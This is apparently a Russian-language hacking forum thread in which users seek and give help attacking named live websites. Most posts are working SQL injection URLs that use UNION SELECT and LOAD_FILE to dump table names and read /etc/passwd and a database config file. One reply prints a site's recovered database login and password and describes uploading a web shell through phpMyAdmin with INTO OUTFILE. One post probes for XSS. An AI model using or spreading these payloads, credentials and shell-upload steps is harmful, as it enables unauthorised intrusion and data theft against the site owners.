Помогите пожалуйста найти админку сайта http://www.mediaport.info а то я искал искал и нашел только директорию /admin/
короче глянул на твой сайтик... http://www.mediaport.info/production.php?theme=-1'%20union%20select%201,2,3,4,5,LOAD_FILE('/'),7,8,9%20from%20mysql.user%20limit%200,1/* тебя наверное порадует... PS Если б не был таким ленивым, то сам бы покоырялся и тебе ничего не сказал :d //пасс мускулистого рута брутится
http://www.bis-el.kiev.ua/index.php?parent_id=0&part_id=1&article_id=-99999+union+select+1,2,3,4,load_file(0x2F6574632F706173737764),6,7,8,9,10,11+from+users/* version():5.1.22-rc-log - можно ли както здесь залить шелл? - имея доступ на чтение файлов как можно узнать полный путь до www? - при использованиии конструкции into outfile можно ли кодировать путь к файлу в хекс?
1)Там есть phpmyadmin через него можно залить шелл читаем конфиг: Code: http://www.bis-el.kiev.ua/index.php?parent_id=0&part_id=1&article_id=-99999+union+select+1,2,3,4,load_file(0x2f686f6d652f6b696e672f7075626c69635f68746d6c2f696e632f64625f6d7973716c2e696e63),6,7,8,9,10,11+from+mysql.user/* оттуда получаем логин/пароль к БД var $User = "clever"; var $Password = "whitebear"; Идем в phpmyadmin http://www.bis-el.kiev.ua/phpmyadm/ и льем шелл через into outfile Путь: /home/king/public_html/ 2)Путь там можно подобрать, т.к там фряха, а в ней через load_file можно читать содержимое дир 3)Путь к файлу в hex кодировать нельзя
сильно не пинайте если что не так) просто я только пробую искать xss при поисковом запросе фразы "><script>alert()</script> на одном сайте имеем следующую ошибку: на белом фоне красуется надпись Internal Server Error The server encountered an internal error or misconfiguration and was unable to complete your request. ... почему спросил, просто много прошарил сайтов и только на этом впервые такая трабла.)
Помогите расковырять инъекцию: http://www.terrorfreetomorrow.org/articlenav.php?id=-1+union+select+1,2,3,4,version(),6
Вот тебе название таблиц http://www.terrorfreetomorrow.org/articlenav.php?id=-1+union+select+1,2,3,4,table_name,6+from+information_schema.tables А дальше уже сам ковыряй её!
Вобщем такая ситуация: Есть сайт: http://www.xxx.com/news.php?type=16 (Выводит новость) При запросе: http://www.xxx.com/news.php?type=17-1 (Выводдит ту же самую новость) При запросе: http://www.xxx.com/news.php?type=17 (Выводдит "Новость не существует") ------------------------------------------------------------- При запросе: http://www.xxxx.com/news.php?type=16+union+select+1,2,3,4,5/* (Выводдит "Новость не существует") При запросе: http://www.xxxx.com/news.php?type=16+union+select+1,2,3,4/* (Выводдит новость с id 16) При запросе: http://www.xxxx.com/news.php?type=16+union+select+1,version(),3,4/* (Выводдит новость с id 16) Вобщем нет никаких ошибок( хотя SQL Inj присутствует ... что делать в такой ситуации ?
Читать статьи про скуль. А что по твоему он должен выводить? http://www.xxxx.com/news.php?type=-16+union+select+1,2,3,4/* Вот так попробуй
